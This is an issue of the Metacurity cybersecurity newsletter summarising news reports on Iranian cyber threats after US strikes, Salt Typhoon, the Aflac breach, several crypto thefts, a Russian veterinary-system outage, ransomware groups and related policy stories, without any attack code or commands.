DHS warns of likely Iranian cyberattacks following Trump's missile strikes

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

The US Department of Homeland Security issued a bulletin warning that Iran-linked hackers and other groups affiliated with Tehran will likely launch cyberattacks against US targets in response to Donald Trump’s order to strike three of Iran’s nuclear sites.

“Low-level cyber attacks against US networks by pro-Iranian hacktivists are likely, and cyber actors affiliated with the Iranian government may conduct attacks against US networks,” said the alert from the National Terrorism Advisory System.

The notice, which expires Sept. 22, adds that “hacktivists and Iranian government-affiliated actors routinely target poorly secured US networks and internet-connected devices for disruptive cyber attacks.”

Under orders from Trump, US bombers struck the Fordow, Natanz, and Isfahan nuclear facilities in Iran on Saturday night, escalating a yearslong tension between the two nations that occurred amid back-and-forth talks seeking to deter Tehran from acquiring a nuclear weapon. Just over a week ago, Israel launched its own incursion against Iranian military officials and scientists because Iran was closer than ever before to having nuclear weapon capabilities.

Joint Chiefs Chair Gen. Dan Caine told reporters that the US Cyber Command was helping support the strikes, although he did not elaborate on its involvement. Last week, critical infrastructure groups called on US companies to proactively step up their defenses in anticipation of an attack. The heightened concern followed a pro-Israeli hacking group known as Predatory Sparrow claiming credit for a cyberattack on Iran’s Bank Sepah.

Other key developments related to Iran's possible cyberattacks on the US include:

• Hackers also targeted Iranian news stations. These incidents coincided with Iran shutting down its internet, which the government later confirmed was to protect against Israeli cyberattacks.
• A sophisticated Iranian cyber group has claimed responsibility for a major attack on the official website of Tirana Municipality, which disabled online services and disrupted the city’s public registration system for kindergartens and nurseries.
• The non-profit think tank the Center for Internet Security (CIS) and Multiple Social media watchdogs confirmed that an Iranian-aligned hacktivist group called “313 Team” claimed responsibility for a Distributed Denial-of-Service (DDoS) attack on Trump’s Truth Social platform just hours after the US strikes. Truth Social went down shortly after 8 p.m. ET on Saturday, moments after Trump announced the strikes on his account.
• Former Justice Department and FBI officials warn that the US's ability to defend against Iranian potential terror and cyber attacks has been hampered by a “brain drain” in top Justice Department and FBI national security and counterterrorism units. (David DiMolfetta / NextGov/FCW, Maggie Miller / Politico, Lorenzo Franceschi-Bicchierai / TechCrunch, Tirana Times, Joe DePaolo / Mediaite, and David Rhode / NBC News)

Related: DHS.gov, LinkedIn, Times of India, Economic Times

The Canadian Centre for Cyber Security and the US Federal Bureau of Investigation urged Canadian organizations to harden their networks against the threat posed by Salt Typhoon, a group linked to the Chinese government.

“The Cyber Centre is aware of malicious cyber activities currently targeting Canadian telecommunications companies,” the center said. “The responsible actors are almost certainly PRC state-sponsored actors, specifically Salt Typhoon,” it said, referring to the People’s Republic of China.

Separate investigations that revealed overlaps with malicious indicators consistent with Salt Typhoon suggest the cyber campaign “is broader than just the telecommunications sector,” it said.

The agency said that hackers will “almost certainly” continue efforts to infiltrate Canadian organizations, especially telecom providers, over the next two years. (Layan Odeh / Bloomberg)

Related: Cyber.gc.ca, Cleveland.com

The cyber threat group Scattered Spider is likely responsible for a cyberattack reported by insurance giant Aflac, during which it potentially stole Social Security numbers, insurance claims, and health information.

“This attack, like many insurance companies are currently experiencing, was caused by a sophisticated cybercrime group,” Aflac said in a statement on Friday, without naming Scattered Spider. Aflac said it “stopped the intrusion within hours” after discovering it last week, that no ransomware was deployed, and that it continues to serve its customers.

The company said it was too early to tell how much customer information may have been stolen, but the potential exposure is vast.

According to Aflac, the hackers used “social engineering” to worm their way into its network. That tactic can involve duping someone into revealing security information to help gain access to a network. It’s a hallmark of Scattered Spider attackers, who are known to pose as tech support to infiltrate big corporations.

Scattered Spider was also likely responsible for attacks on Erie Insurance and Philadelphia Insurance Companies earlier this month, which caused widespread disruptions to IT systems used to serve customers. (Sean Lyngaas / CNN)

Related: SEC, Aflac, ABC News, USA Today, Associated Press, Reuters, The Record, Bleeping Computer, Columbus Ledger-Enquirer, WCVB, The Register, DataBreaches.Net, PCMag, Bloomberg, CNN, eSecurity Planet, BankInfoSecurity.com, CNET, Wall Street Journal, The Cyber Express, SC Media, New York Post, Quartz, Fast Company, Axios, The Hill, CyberScoop, Insurance Journal, UPI, Baller Alert, WPXI-TV, Yahoo Finance, Washington Examiner

The Taiwanese cryptocurrency exchange BitoPro claims the North Korean hacking group Lazarus is behind a cyberattack that led to the theft of $11,000,000 worth of cryptocurrency on May 8, 2025.

The company has attributed the attack to Lazarus based on the evidence recovered from its internal investigations. It notes that the attack patterns and methodology closely resemble those used in past cyberattacks.

"The attack methodology bears resemblance to patterns observed in multiple past international major incidents, including illicit transfers from global bank SWIFT systems and asset theft incidents from major international cryptocurrency exchanges," BitoPro said.

"These attacks are attributed to the North Korean hacking organization Lazarus Group." (Bill Toulas / Bleeping Computer)

Related: BitoPro, BraveNewCoin

CoinMarketCap, the popular cryptocurrency price tracking site, suffered a website supply chain attack that exposed site visitors to a wallet-draining campaign to steal visitors' crypto.

On Friday, CoinMarketCap visitors began seeing Web3 popups asking them to connect their wallets to the site. However, when visitors connected their wallets, a malicious script drained cryptocurrency from them.

The company later confirmed that threat actors used a vulnerability in the site's homepage "doodle" image to inject malicious JavaScript into the site.

"On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected popup for some users when visited our homepage," reads a statement posted on X.

"Upon discovery, We acted immediately to remove the problematic content, identified the root cause, and comprehensive measures have been implemented to isolate and mitigate the issue." (Lawrence Abrams / Bleeping Computer)

Related: Cointelegraph, CoinDesk, CoinGape, BeInCrypto, Cryptopolitan, Crypto Briefing, r/Bitcoin, The Crypto Times, HackRead

Cybersecurity firm Hacken blamed a private key leak that allowed a bad actor to mint and loot $250,000 worth of the ecosystem’s native Hacken Token (HAI), causing it to plummet around 99% on Saturday.

In an X post, Hacken said the private key was connected to an account with a minting role on the Ethereum and BNB Chain, which led to “unauthorized HAI minting and a dump” on decentralized exchanges. This caused a 99% drop in the value of HAI from $0.015 to $0.000056.

Hacken team members said they’ve since revoked the compromised minter account from the token contract and regained control; however, based on Hacken’s current estimates, the bad actor still managed to flee with at least $250,000 worth of tokens. (Stephen Katte / Cointelegraph)

Related: crypto.news, FX Leaders, The Block, The Crypto Times, dev.ua

Blockchain sleuth ZachXBT has accused Garden Finance, which brands itself as “the fastest Bitcoin bridge,” of facilitating the laundering of funds linked to major crypto thefts, including the Bybit hack.

In a post on X, ZachXBT claimed that over 80% of Garden’s recent fee revenue stemmed from illicit transactions allegedly tied to the North Korean Lazarus Group.

The allegation came in response to an earlier post by Jaz Gulati, a co-founder of Garden Finance, who had recently touted the platform’s success, citing 38.86 Bitcoin in collected fees, $300,000 of which was earned over the 12 days ending June 2.

“You conveniently left out >80% of your fees came from Chinese launderers moving Lazarus Group funds from the Bybit hack,” ZachXBT said.

ZachXBT further alleged that a single actor continuously topped up cbBTC liquidity from Coinbase, effectively fueling illicit flows while Garden claimed to operate a trustless and decentralized model.

“Explain how it is ‘decentralized’ when I watched in real time for multiple days as a single entity kept topping up cbBTC liquidity from Coinbase,” ZachXBT wrote, questioning the project’s claims of decentralization.

In response, Garden Finance founder Jaz Gulati denied the allegations, pointing out that 30 BTC in fees were collected before the Bybit incident. He dismissed the criticism as misinformation, calling the “fake decentralized” label baseless. (Amin Haqshanas / Cointelegraph)

Related: The Crypto Times

Russian dairy producers reported supply disruptions following a cyberattack on the country’s digital system for certifying animal-based products.

The Mercury platform, part of Russia’s Federal State Information System for Veterinary Surveillance (VetIS), was taken offline due to the attack. According to local media reports, this is the third such incident this year and the most severe to date.

The outage forced producers and suppliers to revert to paper-based veterinary certificates. This shift caused logistical chaos: Several regional distribution centers refused to accept goods, reports said, and major retailers such as Lenta, Yandex Lavka, and Miratorg experienced supply chain interruptions.

Under Russian law, all businesses handling meat, dairy, eggs, and other animal products must register with Mercury and issue veterinary documents electronically. Without them, processors are legally barred from accepting raw milk, as digital certification is required to verify product authenticity and safety.

While farmers can temporarily use paper certificates, many retailers rely exclusively on electronic document management systems and cannot accept paper-based deliveries. Local media said parts of the supply chain were refused.

According to the dairy industry association Soyuzmoloko, some retailers are refusing to accept products without electronic documents. The group also warned that unclear guidance from regulators has confused suppliers.

The outage has also disrupted data exchange with other government digital platforms, including Russia’s mandatory product labeling system. Large-volume producers have been hit particularly hard, with industry representatives saying the emergency procedures are not designed for prolonged disruptions. (Daryna Antoniuk / The Record)

Related: DairyNews.ru, GBHackers, Milknews.ru

Sources say the White House recently nixed Army Lt. Gen. Richard Angle to be director of the National Security Agency and head of US Cyber Command.

They claim Angle, a career special operations soldier, had the support of Defense Secretary Pete Hegseth and Director of National Intelligence Tulsi Gabbard.

Angle’s name being withdrawn from consideration comes after reporting that both Hegseth and Gabbard have dwindling influence over the White House’s Iran policy. (John Sakellariadis / Politico)

Related: r/politics

US District Judge Ada Brown in Dallas granted preliminary approval to a $177-million settlement that resolves lawsuits against AT&T over breaches in 2024 that exposed personal information belonging to tens of millions of the telecom company’s customers.

The deal resolves claims over data breaches AT&T announced in May and July last year. Depending on which breach is involved, AT&T has agreed to pay up to $2,500 or $5,000 to customers who suffered "fairly traceable" losses from the incidents.

After payments are made for direct losses, the remaining funds will be distributed to customers whose personal information was accessed. (Mike Scarcella and David Shepardson / Reuters)

Related: PhoneArena, Guru Focus

Federal Communications Commission chair Brendan Carr said he had ordered a review of the US Cyber Trust Mark program over "potentially concerning ties to the government of China."

The Cyber Trust Mark program was adopted during the Biden administration as a voluntary device testing program designed to be a safety label for IoT smart products, including home security cameras, TVs, internet-connected appliances, fitness trackers, and baby monitors sold in the US.

Carr said the FCC's Council on National Security would carry out the review. (Rami Ayyub / Reuters)

Related: PCMag, Reuters, Bloomberg Law

Researchers at Cybereason say the Qilin ransomware group appears to be gaining ground even as the first half of 2025 witnessed the decline and demise of several once-dominant ransomware groups, such as LockBit, RansomHub, Everest, and BlackLock, partly due to the impact of previous law enforcement operations, data leaks, and breaches.

The researchers say that what makes Qilin stand out is its activity and the set of advanced features it offers its affiliates.

These offerings range from operational features to more innovative services, such as a “Call Lawyer” function, which provides legal consultation to increase pressure during ransom negotiations.

Moreover, Qilin operates a technically mature infrastructure, with custom-built malware written in Rust and C for cross-platform attacks, including Windows, Linux, and ESXi systems.

The group operates by providing ransomware tools and infrastructure to affiliates, earning a 15–20% share of the ransom payments. It explicitly instructs its affiliates not to target systems located in countries part of the Commonwealth of Independent States (CIS), including Russia and Belarus. (Kevin Poireault / Infosecurity Magazine)

Related: Cybereason, Security Affairs, The Register, Fortra

Paraguay said it would not pay off a ransomware group called Brigada Cyber PMC, which obtained personal data that potentially affected every citizen. 

“The government never negotiates with these types of actors,” said Gustavo Villate, Minister of Technology and Information.

The group posted a ransom message to Paraguayans on the so-called “darknet,” an online space where criminals flog drugs, weapons, and other illicit items and services.

“We have record on EVERY citizen, every person residing in Paraguay,” the group said.

Brigada Cyber PMC added that it would “give a good chance to these bureaucrats [sic] to fix the problem” by paying a ransom of about $1 per citizen by this Friday. The message included a timer counting down the days, hours, minutes, and seconds to the deadline.

Paraguay’s government did not make it public. It was first reported in a blog post by Resecurity, a Los Angeles-based cybersecurity company that is investigating the incident and sharing its findings with Paraguay.

Resecurity said that the attack “could be interpreted as a landmark in known cybersecurity incidents today, by size and scale, as the entire country was extorted due to a massive data breach.” (Aldo Benitez / OCCRP)

Related: Resecurity, GovInfoSecurity

Microsoft shut off the email account of Karim Khan, the prosecutor of the International Criminal Court, after Donald Trump issued an executive order against him for investigating Israel for war crimes, stoking European fears that America would leverage its tech dominance to penalize opponents even in allied countries.

Sources say that some at the ICC are now using Proton, a Swiss company that provides encrypted email services.

An ICC spokesman said it was taking steps to “mitigate risks which may affect the court’s personnel” and “taking extensive measures to ensure the continuity of all relevant operations and services in the face of sanctions.”

The episode has set off alarms across Europe about how dependent European governments, businesses, and citizens are on American tech companies like Microsoft for essential digital infrastructure, and how hard it will be to disentangle themselves. (Adam Satariano and Jeanna Smialek / New York Times)

Related: Reuters, Cryptopolitan, Hacker News (ycombinator)

Sources say Reddit is considering using World ID, the verification system based on iris-scanning Orbs, whose parent company was co-founded by OpenAI CEO Sam Altman.

They say World ID could soon become a way for Reddit users to verify that they are unique individuals while remaining anonymous on the platform.

Talks between representatives of Reddit and World ID parent Tools for Humanity highlight the growing market for new identity verification technologies.

Artificial intelligence floods online platforms with inauthentic content, and governments worldwide are considering new age verification laws to prevent children and teenagers from accessing social media. (Reed Albergotti / Semafor)

Related: The Block, San Francisco Business Times, Cointelegraph, Protos, Crypto Briefing, crypto.news, r/unusual_whales, r/CryptoCurrency, r/singularity, r/privacy, r/RedditAlternatives, r/technology

In an SEC filing, American steel giant Nucor Corporation confirmed that hackers stole some data from its systems during a cyberattack that it reported in May.

Nucor said its investigation showed that the threat actor managed to exfiltrate “limited data” from the compromised IT systems.

“The Company is reviewing and evaluating the impacted data and will carry out any appropriate notifications to potentially affected parties and to regulatory agencies as required by applicable law,” Nucor said. (Eduard Kovacs / Security Week)

Related: SEC, Bleeping Computer, Security Affairs

Best Thing of the Day: Experts Explain Iranian Cyber Attack Threats

Over the weekend, two cyber experts stepped up with predictions of whether "cyberwar" might break out between Iran and the US. Check out the videos below by Marcus Hutchins and Mark Montgomery.

Worst Thing of the Day: Some Things Should Not Be Encrypted

A coordinated effort led by Denmark’s National Special Crime Unit (National Enhed for Særlig Kriminalitet), with the support of the Swedish Police (Polisen) and Europol under the Operational Taskforce (OTF) GRIMM, resulted in the arrests of several individuals suspected of recruiting others, including minors, to carry out contract killings in Denmark using encrypted platforms.

Closing Thought